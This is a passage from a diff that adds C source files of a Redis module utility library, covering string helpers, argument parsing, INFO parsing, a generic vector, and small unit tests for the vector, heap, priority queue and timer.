+ * This file is used in order to change the SDS allocator at compile time.
+ * Just define the following defines to what you want to use. Also add
+ * the include of your alternate allocator if needed (not needed in order
+ * to use the default libc allocator). */
+
+#if defined(__MACH__)
+#include <stdlib.h>
+#else
+#include <malloc.h>
+#endif
+//#include "zmalloc.h"
+#define s_malloc malloc
+#define s_realloc realloc
+#define s_free free
@@ -0,0 +1,81 @@
+#include <string.h>
+#include <sys/param.h>
+#include <ctype.h>
+#include "strings.h"
+#include "alloc.h"
+
+#include "sds.h"
+
+// RedisModuleString *RMUtil_CreateFormattedString(RedisModuleCtx *ctx, const char *fmt, ...) {
+//     sds s = sdsempty();
+
+//     va_list ap;
+//     va_start(ap, fmt);
+//     s = sdscatvprintf(s, fmt, ap);
+//     va_end(ap);
+
+//     RedisModuleString *ret = RedisModule_CreateString(ctx, (const char *)s, sdslen(s));
+//     sdsfree(s);
+//     return ret;
+// }
+
+int RMUtil_StringEquals(RedisModuleString *s1, RedisModuleString *s2) {
+
+  const char *c1, *c2;
+  size_t l1, l2;
+  c1 = RedisModule_StringPtrLen(s1, &l1);
+  c2 = RedisModule_StringPtrLen(s2, &l2);
+  if (l1 != l2) return 0;
+
+  return strncmp(c1, c2, l1) == 0;
+}
+
+int RMUtil_StringEqualsC(RedisModuleString *s1, const char *s2) {
+
+  const char *c1;
+  size_t l1, l2 = strlen(s2);
+  c1 = RedisModule_StringPtrLen(s1, &l1);
+  if (l1 != l2) return 0;
+
+  return strncmp(c1, s2, l1) == 0;
+}
+int RMUtil_StringEqualsCaseC(RedisModuleString *s1, const char *s2) {
+
+  const char *c1;
+  size_t l1, l2 = strlen(s2);
+  c1 = RedisModule_StringPtrLen(s1, &l1);
+  if (l1 != l2) return 0;
+
+  return strncasecmp(c1, s2, l1) == 0;
+}
+
+void RMUtil_StringToLower(RedisModuleString *s) {
+
+  size_t l;
+  char *c = (char *)RedisModule_StringPtrLen(s, &l);
+  size_t i;
+  for (i = 0; i < l; i++) {
+    *c = tolower(*c);
+    ++c;
+  }
+}
+
+void RMUtil_StringToUpper(RedisModuleString *s) {
+  size_t l;
+  char *c = (char *)RedisModule_StringPtrLen(s, &l);
+  size_t i;
+  for (i = 0; i < l; i++) {
+    *c = toupper(*c);
+    ++c;
+  }
+}
+
+void RMUtil_StringConvert(RedisModuleString **rs, const char **ss, size_t n, int options) {
+  for (size_t ii = 0; ii < n; ++ii) {
+    const char *p = RedisModule_StringPtrLen(rs[ii], NULL);
+    if (options & RMUTIL_STRINGCONVERT_COPY) {
+      p = strdup(p);
+    }
+    ss[ii] = p;
+  }
+}
@@ -0,0 +1,38 @@
+#ifndef __RMUTIL_STRINGS_H__
+#define __RMUTIL_STRINGS_H__
+
+#include <redismodule.h>
+
+/*
+* Create a new RedisModuleString object from a printf-style format and arguments.
+* Note that RedisModuleString objects CANNOT be used as formatting arguments.
+*/
+// DEPRECATED since it was added to the RedisModule API. Replaced with a macro below
+// RedisModuleString *RMUtil_CreateFormattedString(RedisModuleCtx *ctx, const char *fmt, ...);
+#define RMUtil_CreateFormattedString RedisModule_CreateStringPrintf
+
+/* Return 1 if the two strings are equal. Case *sensitive* */
+int RMUtil_StringEquals(RedisModuleString *s1, RedisModuleString *s2);
+
+/* Return 1 if the string is equal to a C NULL terminated string. Case *sensitive* */
+int RMUtil_StringEqualsC(RedisModuleString *s1, const char *s2);
+
+/* Return 1 if the string is equal to a C NULL terminated string. Case *insensitive* */
+int RMUtil_StringEqualsCaseC(RedisModuleString *s1, const char *s2);
+
+/* Converts a redis string to lowercase in place without reallocating anything */
+void RMUtil_StringToLower(RedisModuleString *s);
+
+/* Converts a redis string to uppercase in place without reallocating anything */
+void RMUtil_StringToUpper(RedisModuleString *s);
+
+// If set, copy the strings using strdup rather than simply storing pointers.
+#define RMUTIL_STRINGCONVERT_COPY 1
+
+/**
+ * Convert one or more RedisModuleString objects into `const char*`.
+ * Both rs and ss are arrays, and should be of <n> length.
+ * Options may be 0 or `RMUTIL_STRINGCONVERT_COPY`
+ */
+void RMUtil_StringConvert(RedisModuleString **rs, const char **ss, size_t n, int options);
+#endif
@@ -0,0 +1,69 @@
+#ifndef __TESTUTIL_H__
+#define __TESTUTIL_H__
+
+#include <assert.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+static int numTests = 0;
+static int numAsserts = 0;
+
+#define TESTFUNC(f)                        \
+  printf("  Testing %s\t\t", __STRING(f)); \
+  numTests++;                              \
+  fflush(stdout);                          \
+  if (f()) {                               \
+    printf(" %s FAILED!\n", __STRING(f));  \
+    exit(1);                               \
+  } else                                   \
+    printf("[PASS]\n");
+
+#define ASSERTM(expr, ...)                                                                 \
+  if (!(expr)) {                                                                           \
+    fprintf(stderr, "%s:%d: Assertion '%s' Failed: " __VA_ARGS__ "\n", __FILE__, __LINE__, \
+            __STRING(expr));                                                               \
+    return -1;                                                                             \
+  }                                                                                        \
+  numAsserts++;
+
+#define ASSERT(expr)                                                                      \
+  if (!(expr)) {                                                                          \
+    fprintf(stderr, "%s:%d Assertion '%s' Failed\n", __FILE__, __LINE__, __STRING(expr)); \
+    return -1;                                                                            \
+  }                                                                                       \
+  numAsserts++;
+
+#define ASSERT_STRING_EQ(s1, s2) ASSERT(!strcmp(s1, s2));
+
+#define ASSERT_EQUAL(x, y, ...)                                           \
+  if (x != y) {                                                           \
+    fprintf(stderr, "%s:%d: ", __FILE__, __LINE__);                       \
+    fprintf(stderr, "%g != %g: " __VA_ARGS__ "\n", (double)x, (double)y); \
+    return -1;                                                            \
+  }                                                                       \
+  numAsserts++;
+
+#define FAIL(fmt, ...)                                                            \
+  {                                                                               \
+    fprintf(stderr, "%s:%d: FAIL: " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__); \
+    return -1;                                                                    \
+  }
+
+#define RETURN_TEST_SUCCESS return 0;
+#define TEST_CASE(x, block) \
+  int x {                   \
+    block;                  \
+    return 0                \
+  }
+
+#define PRINT_TEST_SUMMARY printf("\nTotal: %d tests and %d assertions OK\n", numTests, numAsserts);
+
+#define TEST_MAIN(body)                         \
+  int main(int argc, char **argv) {             \
+    printf("Starting Test '%s'...\n", argv[0]); \
+    body;                                       \
+    PRINT_TEST_SUMMARY;                         \
+    printf("\n--------------------\n\n");       \
+    return 0;                                   \
+  }
+#endif
@@ -0,0 +1,38 @@
+#include <stdio.h>
+#include "heap.h"
+#include "assert.h"
+
+int cmp(void *a, void *b) {
+    int *__a = (int *) a;
+    int *__b = (int *) b;
+    return *__a - *__b;
+}
+
+int main(int argc, char **argv) {
+    int myints[] = {10, 20, 30, 5, 15};
+    Vector *v = NewVector(int, 5);
+    for (int i = 0; i < 5; i++) {
+        Vector_Push(v, myints[i]);
+    }
+
+    Make_Heap(v, 0, v->top, cmp);
+
+    int n;
+    Vector_Get(v, 0, &n);
+    assert(30 == n);
+
+    Heap_Pop(v, 0, v->top, cmp);
+    v->top = 4;
+    Vector_Get(v, 0, &n);
+    assert(20 == n);
+
+    Vector_Push(v, 99);
+    Heap_Push(v, 0, v->top, cmp);
+    Vector_Get(v, 0, &n);
+    assert(99 == n);
+
+    Vector_Free(v);
+    printf("PASS!\n");
+    return 0;
+}
+
@@ -0,0 +1,26 @@
+#include <stdio.h>
+#include <redismodule.h>
+#include <unistd.h>
+#include "periodic.h"
+#include "assert.h"
+#include "test.h"
+
+void timerCb(RedisModuleCtx *ctx, void *p) {
+  int *x = p;
+  (*x)++;
+}
+
+int testPeriodic() {
+  int x = 0;
+  struct RMUtilTimer *tm = RMUtil_NewPeriodicTimer(
+      timerCb, NULL, &x, (struct timespec){.tv_sec = 0, .tv_nsec = 10000000});
+
+  sleep(1);
+
+  ASSERT_EQUAL(0, RMUtilTimer_Terminate(tm));
+  ASSERT(x > 0);
+  ASSERT(x <= 100);
+  return 0;
+}
+
+TEST_MAIN({ TESTFUNC(testPeriodic); });
@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include "assert.h"
+#include "priority_queue.h"
+
+int cmp(void* i1, void* i2) {
+    int *__i1 = (int*) i1;
+    int *__i2 = (int*) i2;
+    return *__i1 - *__i2;
+}
+
+int main(int argc, char **argv) {
+    PriorityQueue *pq = NewPriorityQueue(int, 10, cmp);
+    assert(0 == Priority_Queue_Size(pq));
+
+    for (int i = 0; i < 5; i++) {
+        Priority_Queue_Push(pq, i);
+    }
+    assert(5 == Priority_Queue_Size(pq));
+
+    Priority_Queue_Pop(pq);
+    assert(4 == Priority_Queue_Size(pq));
+
+    Priority_Queue_Push(pq, 10);
+    Priority_Queue_Push(pq, 20);
+    Priority_Queue_Push(pq, 15);
+    int n;
+    Priority_Queue_Top(pq, &n);
+    assert(20 == n);
+
+    Priority_Queue_Pop(pq);
+    Priority_Queue_Top(pq, &n);
+    assert(15 == n);
+
+    Priority_Queue_Free(pq);
+    printf("PASS!\n");
+    return 0;
+}
@@ -0,0 +1,67 @@
+#ifndef __TEST_UTIL_H__
+#define __TEST_UTIL_H__
+
+#include "util.h"
+#include <stdarg.h>
+#include <stdlib.h>
+#include <string.h>
+
+
+#define RMUtil_Test(f) \
+                if (argc < 2 || RMUtil_ArgExists(__STRING(f), argv, argc, 1)) { \
+                    int rc = f(ctx); \
+                    if (rc != REDISMODULE_OK) { \
+                        RedisModule_ReplyWithError(ctx, "Test " __STRING(f) " FAILED"); \
+                        return REDISMODULE_ERR;\
+                    }\
+                }
+           
+                
+#define RMUtil_Assert(expr) if (!(expr)) { fprintf (stderr, "Assertion '%s' Failed\n", __STRING(expr)); return REDISMODULE_ERR; }
+
+#define RMUtil_AssertReplyEquals(rep, cstr) RMUtil_Assert( \
+            RMUtil_StringEquals(RedisModule_CreateStringFromCallReply(rep), RedisModule_CreateString(ctx, cstr, strlen(cstr))) \
+            )
+#            
+
+/**
+* Create an arg list to pass to a redis command handler manually, based on the format in fmt.
+* The accepted format specifiers are:
+*   c - for null terminated c strings
+*   s - for RedisModuleString* objects
+*   l - for longs
+*
+*  Example:  RMUtil_MakeArgs(ctx, &argc, "clc", "hello", 1337, "world");
+*
+*  Returns an array of RedisModuleString pointers. The size of the array is store in argcp
+*/
+RedisModuleString **RMUtil_MakeArgs(RedisModuleCtx *ctx, int *argcp, const char *fmt, ...) {
+    
+    va_list ap;
+    va_start(ap, fmt);
+    RedisModuleString **argv = calloc(strlen(fmt), sizeof(RedisModuleString*));
+    int argc = 0;
+    const char *p = fmt;
+    while(*p) {
+        if (*p == 'c') {
+            char *cstr = va_arg(ap,char*);
+            argv[argc++] = RedisModule_CreateString(ctx, cstr, strlen(cstr));
+        } else if (*p == 's') {
+            argv[argc++] = va_arg(ap,void*);;
+        } else if (*p == 'l') {
+            long ll = va_arg(ap,long long);
+            argv[argc++] = RedisModule_CreateStringFromLongLong(ctx, ll);
+        } else {
+            goto fmterr;
+        }
+        p++;
+    }
+    *argcp = argc;
+    
+    return argv;
+fmterr:
+    free(argv);
+    return NULL;
+}
+
+#endif
@@ -0,0 +1,58 @@
+#include "vector.h"
+#include <stdio.h>
+#include "test.h"
+
+int testVector() {
+
+  Vector *v = NewVector(int, 1);
+  ASSERT(v != NULL);
+  // Vector_Put(v, 0, 1);
+  // Vector_Put(v, 1, 3);
+  for (int i = 0; i < 10; i++) {
+    Vector_Push(v, i);
+  }
+  ASSERT_EQUAL(10, Vector_Size(v));
+  ASSERT_EQUAL(16, Vector_Cap(v));
+
+  for (int i = 0; i < Vector_Size(v); i++) {
+    int n;
+    int rc = Vector_Get(v, i, &n);
+    ASSERT_EQUAL(1, rc);
+    // printf("%d %d\n", rc, n);
+
+    ASSERT_EQUAL(n, i);
+  }
+
+  Vector_Free(v);
+
+  v = NewVector(char *, 0);
+  int N = 4;
+  char *strings[4] = {"hello", "world", "foo", "bar"};
+
+  for (int i = 0; i < N; i++) {
+    Vector_Push(v, strings[i]);
+  }
+  ASSERT_EQUAL(N, Vector_Size(v));
+  ASSERT(Vector_Cap(v) >= N);
+
+  for (int i = 0; i < Vector_Size(v); i++) {
+    char *x;
+    int rc = Vector_Get(v, i, &x);
+    ASSERT_EQUAL(1, rc);
+    ASSERT_STRING_EQ(x, strings[i]);
+  }
+
+  int rc = Vector_Get(v, 100, NULL);
+  ASSERT_EQUAL(0, rc);
+
+  Vector_Free(v);
+
+  return 0;
+  // Vector_Push(v, "hello");
+  // Vector_Push(v, "world");
+  // char *x = NULL;
+  // int rc = Vector_Getx(v, 0, &x);
+  // printf("rc: %d got %s\n", rc, x);
+}
+
+TEST_MAIN({ TESTFUNC(testVector); });
@@ -0,0 +1,299 @@
+#include <stdlib.h>
+#include <errno.h>
+#include <math.h>
+#include <ctype.h>
+#include <sys/time.h>
+#include <stdarg.h>
+#include <limits.h>
+#include <string.h>
+#define REDISMODULE_EXPERIMENTAL_API
+#include <redismodule.h>
+#include "util.h"
+
+/**
+Check if an argument exists in an argument list (argv,argc), starting at offset.
+@return 0 if it doesn't exist, otherwise the offset it exists in
+*/
+int RMUtil_ArgExists(const char *arg, RedisModuleString **argv, int argc, int offset) {
+
+  size_t larg = strlen(arg);
+  for (; offset < argc; offset++) {
+    size_t l;
+    const char *carg = RedisModule_StringPtrLen(argv[offset], &l);
+    if (l != larg) continue;
+    if (carg != NULL && strncasecmp(carg, arg, larg) == 0) {
+      return offset;
+    }
+  }
+  return 0;
+}
+
+/**
+Check if an argument exists in an argument list (argv,argc)
+@return -1 if it doesn't exist, otherwise the offset it exists in
+*/
+int RMUtil_ArgIndex(const char *arg, RedisModuleString **argv, int argc) {
+
+  size_t larg = strlen(arg);
+  for (int offset = 0; offset < argc; offset++) {
+    size_t l;
+    const char *carg = RedisModule_StringPtrLen(argv[offset], &l);
+    if (l != larg) continue;
+    if (carg != NULL && strncasecmp(carg, arg, larg) == 0) {
+      return offset;
+    }
+  }
+  return -1;
+}
+
+RMUtilInfo *RMUtil_GetRedisInfo(RedisModuleCtx *ctx) {
+
+  RedisModuleCallReply *r = RedisModule_Call(ctx, "INFO", "c", "all");
+  if (r == NULL || RedisModule_CallReplyType(r) == REDISMODULE_REPLY_ERROR) {
+    return NULL;
+  }
+
+  int cap = 100;  // rough estimate of info lines
+  RMUtilInfo *info = malloc(sizeof(RMUtilInfo));
+  info->entries = calloc(cap, sizeof(RMUtilInfoEntry));
+
+  int i = 0;
+  size_t sz;
+  char *text = (char *)RedisModule_CallReplyStringPtr(r, &sz);
+
+  char *line = text;
+  while (line && line < text + sz) {
+    char *line = strsep(&text, "\r\n");
+    if (line == NULL) break;
+
+    if (!(*line >= 'a' && *line <= 'z')) {  // skip non entry lines
+      continue;
+    }
+
+    char *key = strsep(&line, ":");
+    info->entries[i].key = strdup(key);
+    info->entries[i].val = strdup(line);
+    i++;
+    if (i >= cap) {
+      cap *= 2;
+      info->entries = realloc(info->entries, cap * sizeof(RMUtilInfoEntry));
+    }
+  }
+  info->numEntries = i;
+  RedisModule_FreeCallReply(r);
+  return info;
+}
+void RMUtilRedisInfo_Free(RMUtilInfo *info) {
+  for (int i = 0; i < info->numEntries; i++) {
+    free(info->entries[i].key);
+    free(info->entries[i].val);
+  }
+  free(info->entries);
+  free(info);
+}
+
+int RMUtilInfo_GetInt(RMUtilInfo *info, const char *key, long long *val) {
+
+  const char *p = NULL;
+  if (!RMUtilInfo_GetString(info, key, &p)) {
+    return 0;
+  }
+
+  *val = strtoll(p, NULL, 10);
+  if ((errno == ERANGE && (*val == LONG_MAX || *val == LONG_MIN)) || (errno != 0 && *val == 0)) {
+    *val = -1;
+    return 0;
+  }
+
+  return 1;
+}
+
+int RMUtilInfo_GetString(RMUtilInfo *info, const char *key, const char **str) {
+  int i;
+  for (i = 0; i < info->numEntries; i++) {
+    if (!strcmp(key, info->entries[i].key)) {
+      *str = info->entries[i].val;
+      return 1;
+    }
+  }
+  return 0;
+}
+
+int RMUtilInfo_GetDouble(RMUtilInfo *info, const char *key, double *d) {
+  const char *p = NULL;
+  if (!RMUtilInfo_GetString(info, key, &p)) {
+    printf("not found %s\n", key);
+    return 0;
+  }
+
+  *d = strtod(p, NULL);
+  if ((errno == ERANGE && (*d == HUGE_VAL || *d == -HUGE_VAL)) || (errno != 0 && *d == 0)) {
+    return 0;
+  }
+
+  return 1;
+}
+
+/*
+c -- pointer to a Null terminated C string pointer.
+b -- pointer to a C buffer, followed by pointer to a size_t for its length
+s -- pointer to a RedisModuleString
+l -- pointer to Long long integer.
+d -- pointer to a Double
+* -- do not parse this argument at all
+*/
+int RMUtil_ParseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, ...) {
+  va_list ap;
+  va_start(ap, fmt);
+  int rc = rmutil_vparseArgs(argv, argc, offset, fmt, ap);
+  va_end(ap);
+  return rc;
+}
+
+// Internal function that parses arguments based on the format described above
+int rmutil_vparseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, va_list ap) {
+
+  int i = offset;
+  char *c = (char *)fmt;
+  while (*c && i < argc) {
+
+    // read c string
+    if (*c == 'c') {
+      char **p = va_arg(ap, char **);
+      *p = (char *)RedisModule_StringPtrLen(argv[i], NULL);
+    } else if (*c == 'b') {
+      char **p = va_arg(ap, char **);
+      size_t *len = va_arg(ap, size_t *);
+      *p = (char *)RedisModule_StringPtrLen(argv[i], len);
+    } else if (*c == 's') {  // read redis string
+
+      RedisModuleString **s = va_arg(ap, void *);
+      *s = argv[i];
+
+    } else if (*c == 'l') {  // read long
+      long long *l = va_arg(ap, long long *);
+
+      if (RedisModule_StringToLongLong(argv[i], l) != REDISMODULE_OK) {
+        return REDISMODULE_ERR;
+      }
+    } else if (*c == 'd') {  // read double
+      double *d = va_arg(ap, double *);
+      if (RedisModule_StringToDouble(argv[i], d) != REDISMODULE_OK) {
+        return REDISMODULE_ERR;
+      }
+    } else if (*c == '*') {  // skip current arg
+      // do nothing
+    } else {
+      return REDISMODULE_ERR;  // WAT?
+    }
+    c++;
+    i++;
+  }
+  // if the format is longer than argc, retun an error
+  if (*c != 0) {
+    return REDISMODULE_ERR;
+  }
+  return REDISMODULE_OK;
+}
+
+int RMUtil_ParseArgsAfter(const char *token, RedisModuleString **argv, int argc, const char *fmt,
+                          ...) {
+
+  int pos = RMUtil_ArgIndex(token, argv, argc);
+  if (pos < 0) {
+    return REDISMODULE_ERR;
+  }
+
+  va_list ap;
+  va_start(ap, fmt);
+  int rc = rmutil_vparseArgs(argv, argc, pos + 1, fmt, ap);
+  va_end(ap);
+  return rc;
+}
+
+RedisModuleCallReply *RedisModule_CallReplyArrayElementByPath(RedisModuleCallReply *rep,
+                                                              const char *path) {
+  if (rep == NULL) return NULL;
+
+  RedisModuleCallReply *ele = rep;
+  const char *s = path;
+  char *e;
+  long idx;
+  do {
+    errno = 0;
+    idx = strtol(s, &e, 10);
+
+    if ((errno == ERANGE && (idx == LONG_MAX || idx == LONG_MIN)) || (errno != 0 && idx == 0) ||
+        (REDISMODULE_REPLY_ARRAY != RedisModule_CallReplyType(ele)) || (s == e)) {
+      ele = NULL;
+      break;
+    }
+    s = e;
+    ele = RedisModule_CallReplyArrayElement(ele, idx - 1);
+
+  } while ((ele != NULL) && (*e != '\0'));
+
+  return ele;
+}
+
+int RedisModule_TryGetValue(RedisModuleKey *key, const RedisModuleType *type, void **out) {
+  if (key == NULL) {
+    return RMUTIL_VALUE_MISSING;
+  }
+  int keytype = RedisModule_KeyType(key);
+  if (keytype == REDISMODULE_KEYTYPE_EMPTY) {
+    return RMUTIL_VALUE_EMPTY;
+  } else if (keytype == REDISMODULE_KEYTYPE_MODULE && RedisModule_ModuleTypeGetType(key) == type) {
+    *out = RedisModule_ModuleTypeGetValue(key);
+    return RMUTIL_VALUE_OK;
+  } else {
+    return RMUTIL_VALUE_MISMATCH;
+  }
+}
+
+RedisModuleString **RMUtil_ParseVarArgs(RedisModuleString **argv, int argc, int offset,
+                                        const char *keyword, size_t *nargs) {
+  if (offset > argc) {
+    return NULL;
+  }
+
+  argv += offset;
+  argc -= offset;
+
+  int ix = RMUtil_ArgIndex(keyword, argv, argc);
+  if (ix < 0) {
+    return NULL;
+  } else if (ix >= argc - 1) {
+    *nargs = RMUTIL_VARARGS_BADARG;
+    return argv;
+  }
+
+  argv += (ix + 1);
+  argc -= (ix + 1);
+
+  long long n = 0;
+  RMUtil_ParseArgs(argv, argc, 0, "l", &n);
+  if (n > argc - 1 || n < 0) {
+    *nargs = RMUTIL_VARARGS_BADARG;
+    return argv;
+  }
+
+  *nargs = n;
+  return argv + 1;
+}
+
+void RMUtil_DefaultAofRewrite(RedisModuleIO *aof, RedisModuleString *key, void *value) {
+  RedisModuleCtx *ctx = RedisModule_GetThreadSafeContext(NULL);
+  RedisModuleCallReply *rep = RedisModule_Call(ctx, "DUMP", "s", key);
+  if (rep != NULL && RedisModule_CallReplyType(rep) == REDISMODULE_REPLY_STRING) {
+    size_t n;
+    const char *s = RedisModule_CallReplyStringPtr(rep, &n);
+    RedisModule_EmitAOF(aof, "RESTORE", "slb", key, 0, s, n);
+  } else {
+    RedisModule_Log(RedisModule_GetContextFromIO(aof), "warning", "Failed to emit AOF");
+  }
+  if (rep != NULL) {
+    RedisModule_FreeCallReply(rep);
+  }
+  RedisModule_FreeThreadSafeContext(ctx);
+}
@@ -0,0 +1,149 @@
+#ifndef __UTIL_H__
+#define __UTIL_H__
+
+#include <redismodule.h>
+#include <stdarg.h>
+
+/// make sure the response is not NULL or an error, and if it is sends the error to the client and
+/// exit the current function
+#define RMUTIL_ASSERT_NOERROR(ctx, r)                                   \
+  if (r == NULL) {                                                      \
+    return RedisModule_ReplyWithError(ctx, "ERR reply is NULL");        \
+  } else if (RedisModule_CallReplyType(r) == REDISMODULE_REPLY_ERROR) { \
+    RedisModule_ReplyWithCallReply(ctx, r);                             \
+    return REDISMODULE_ERR;                                             \
+  }
+
+#define __rmutil_register_cmd(ctx, cmd, f, mode)                                \
+  if (RedisModule_CreateCommand(ctx, cmd, f, mode, 1, 1, 1) == REDISMODULE_ERR) \
+    return REDISMODULE_ERR;
+
+#define RMUtil_RegisterReadCmd(ctx, cmd, f) __rmutil_register_cmd(ctx, cmd, f, "readonly")
+
+#define RMUtil_RegisterWriteCmd(ctx, cmd, f) __rmutil_register_cmd(ctx, cmd, f, "write")
+
+/* RedisModule utilities. */
+
+/** DEPRECATED: Return the offset of an arg if it exists in the arg list, or 0 if it's not there */
+int RMUtil_ArgExists(const char *arg, RedisModuleString **argv, int argc, int offset);
+
+/* Same as argExists but returns -1 if not found. Use this, RMUtil_ArgExists is kept for backwards
+compatibility. */
+int RMUtil_ArgIndex(const char *arg, RedisModuleString **argv, int argc);
+
+/**
+Automatically conver the arg list to corresponding variable pointers according to a given format.
+You pass it the command arg list and count, the starting offset, a parsing format, and pointers to
+the variables.
+The format is a string consisting of the following identifiers:
+
+    c -- pointer to a Null terminated C string pointer.
+    s -- pointer to a RedisModuleString
+    l -- pointer to Long long integer.
+    d -- pointer to a Double
+    * -- do not parse this argument at all
+
+Example: If I want to parse args[1], args[2] as a long long and double, I do:
+    double d;
+    long long l;
+    RMUtil_ParseArgs(argv, argc, 1, "ld", &l, &d);
+*/
+int RMUtil_ParseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, ...);
+
+/**
+Same as RMUtil_ParseArgs, but only parses the arguments after `token`, if it was found.
+This is useful for optional stuff like [LIMIT [offset] [limit]]
+*/
+int RMUtil_ParseArgsAfter(const char *token, RedisModuleString **argv, int argc, const char *fmt,
+                          ...);
+
+int rmutil_vparseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, va_list ap);
+
+#define RMUTIL_VARARGS_BADARG ((size_t)-1)
+/**
+ * Parse arguments in the form of KEYWORD {len} {arg} .. {arg}_len.
+ * If keyword is present, returns the position within `argv` containing the arguments.
+ * Returns NULL if the keyword is not found.
+ * If a parse error has occurred, `nargs` is set to RMUTIL_VARARGS_BADARG, but
+ * the return value is not NULL.
+ */
+RedisModuleString **RMUtil_ParseVarArgs(RedisModuleString **argv, int argc, int offset,
+                                        const char *keyword, size_t *nargs);
+
+/**
+ * Default implementation of an AoF rewrite function that simply calls DUMP/RESTORE
+ * internally. To use this function, pass it as the .aof_rewrite value in
+ * RedisModuleTypeMethods
+ */
+void RMUtil_DefaultAofRewrite(RedisModuleIO *aof, RedisModuleString *key, void *value);
+
+// A single key/value entry in a redis info map
+typedef struct {
+  char *key;
+  char *val;
+} RMUtilInfoEntry;
+
+// Representation of INFO command response, as a list of k/v pairs
+typedef struct {
+  RMUtilInfoEntry *entries;
+  int numEntries;
+} RMUtilInfo;
+
+/**
+* Get redis INFO result and parse it as RMUtilInfo.
+* Returns NULL if something goes wrong.
+* The resulting object needs to be freed with RMUtilRedisInfo_Free
+*/
+RMUtilInfo *RMUtil_GetRedisInfo(RedisModuleCtx *ctx);
+
+/**
+* Free an RMUtilInfo object and its entries
+*/
+void RMUtilRedisInfo_Free(RMUtilInfo *info);
+
+/**
+* Get an integer value from an info object. Returns 1 if the value was found and
+* is an integer, 0 otherwise. the value is placed in 'val'
+*/
+int RMUtilInfo_GetInt(RMUtilInfo *info, const char *key, long long *val);
+
+/**
+* Get a string value from an info object. The value is placed in str.
+* Returns 1 if the key was found, 0 if not
+*/
+int RMUtilInfo_GetString(RMUtilInfo *info, const char *key, const char **str);
+
+/**
+* Get a double value from an info object. Returns 1 if the value was found and is
+* a correctly formatted double, 0 otherwise. the value is placed in 'd'
+*/
+int RMUtilInfo_GetDouble(RMUtilInfo *info, const char *key, double *d);
+
+/*
+* Returns a call reply array's element given by a space-delimited path. E.g.,
+* the path "1 2 3" will return the 3rd element from the 2 element of the 1st
+* element from an array (or NULL if not found)
+*/
+RedisModuleCallReply *RedisModule_CallReplyArrayElementByPath(RedisModuleCallReply *rep,
+                                                              const char *path);
+
+/**
+ * Extract the module type from an opened key.
+ */
+typedef enum {
+  RMUTIL_VALUE_OK = 0,
+  RMUTIL_VALUE_MISSING,
+  RMUTIL_VALUE_EMPTY,
+  RMUTIL_VALUE_MISMATCH
+} RMUtil_TryGetValueStatus;
+
+/**
+ * Tries to extract the module-specific type from the value.
+ * @param key an opened key (may be null)
+ * @param type the pointer to the type to match to
+ * @param[out] out if the value is present, will be set to it.
+ * @return a value in the @ref RMUtil_TryGetValueStatus enum.
+ */
+int RedisModule_TryGetValue(RedisModuleKey *key, const RedisModuleType *type, void **out);
+
+#endif
@@ -0,0 +1,88 @@
+#include "vector.h"
+#include <stdio.h>
+
+inline int __vector_PushPtr(Vector *v, void *elem) {
+  if (v->top == v->cap) {
+    Vector_Resize(v, v->cap ? v->cap * 2 : 1);
+  }
+
+  __vector_PutPtr(v, v->top, elem);
+  return v->top;
+}
+
+inline int Vector_Get(Vector *v, size_t pos, void *ptr) {
+  // return 0 if pos is out of bounds
+  if (pos >= v->top) {
+    return 0;
+  }
+
+  memcpy(ptr, v->data + (pos * v->elemSize), v->elemSize);
+  return 1;
+}
+
+/* Get the element at the end of the vector, decreasing the size by one */
+inline int Vector_Pop(Vector *v, void *ptr) {
+  if (v->top > 0) {
+    if (ptr != NULL) {
+      Vector_Get(v, v->top - 1, ptr);
+    }
+    v->top--;
+    return 1;
+  }
+  return 0;
+}
+
+inline int __vector_PutPtr(Vector *v, size_t pos, void *elem) {
+  // resize if pos is out of bounds
+  if (pos >= v->cap) {
+    Vector_Resize(v, pos + 1);
+  }
+
+  if (elem) {
+    memcpy(v->data + pos * v->elemSize, elem, v->elemSize);
+  } else {
+    memset(v->data + pos * v->elemSize, 0, v->elemSize);
+  }
+  // move the end offset to pos if we grew
+  if (pos >= v->top) {
+    v->top = pos + 1;
+  }
+  return 1;
+}
+
+int Vector_Resize(Vector *v, size_t newcap) {
+  int oldcap = v->cap;
+  v->cap = newcap;
+
+  v->data = realloc(v->data, v->cap * v->elemSize);
+
+  // If we grew:
+  // put all zeros at the newly realloc'd part of the vector
+  if (newcap > oldcap) {
+    int offset = oldcap * v->elemSize;
+    memset(v->data + offset, 0, v->cap * v->elemSize - offset);
+  }
+  return v->cap;
+}
+
+Vector *__newVectorSize(size_t elemSize, size_t cap) {
+  Vector *vec = malloc(sizeof(Vector));
+  vec->data = calloc(cap, elemSize);
+  vec->top = 0;
+  vec->elemSize = elemSize;
+  vec->cap = cap;
+
+  return vec;
+}
+
+void Vector_Free(Vector *v) {
+  free(v->data);
+  free(v);
+}
+
+
+/* return the used size of the vector, regardless of capacity */
+inline int Vector_Size(Vector *v) { return v->top; }
+
+/* return the actual capacity */
+inline int Vector_Cap(Vector *v) { return v->cap; }
@@ -0,0 +1,73 @@
+#ifndef __VECTOR_H__
+#define __VECTOR_H__
+#include <stdlib.h>
+#include <string.h>
+#include <stdarg.h>
+
+/*
+* Generic resizable vector that can be used if you just want to store stuff
+* temporarily.
+* Works like C++ std::vector with an underlying resizable buffer
+*/
+typedef struct {
+    char *data;
+    size_t elemSize;
+    size_t cap;
+    size_t top;
+
+} Vector;
+
+/* Create a new vector with element size. This should generally be used
+ * internall by the NewVector macro */
+Vector *__newVectorSize(size_t elemSize, size_t cap);
+
+// Put a pointer in the vector. To be used internall by the library
+int __vector_PutPtr(Vector *v, size_t pos, void *elem);
+
+/*
+* Create a new vector for a given type and a given capacity.
+* e.g. NewVector(int, 0) - empty vector of ints
+*/
+#define NewVector(type, cap) __newVectorSize(sizeof(type), cap)
+
+/*
+* get the element at index pos. The value is copied in to ptr. If pos is outside
+* the vector capacity, we return 0
+* otherwise 1
+*/
+int Vector_Get(Vector *v, size_t pos, void *ptr);
+
+/* Get the element at the end of the vector, decreasing the size by one */
+int Vector_Pop(Vector *v, void *ptr);
+
+//#define Vector_Getx(v, pos, ptr) pos < v->cap ? 1 : 0; *ptr =
+//*(typeof(ptr))(v->data + v->elemSize*pos)
+
+/*
+* Put an element at pos.
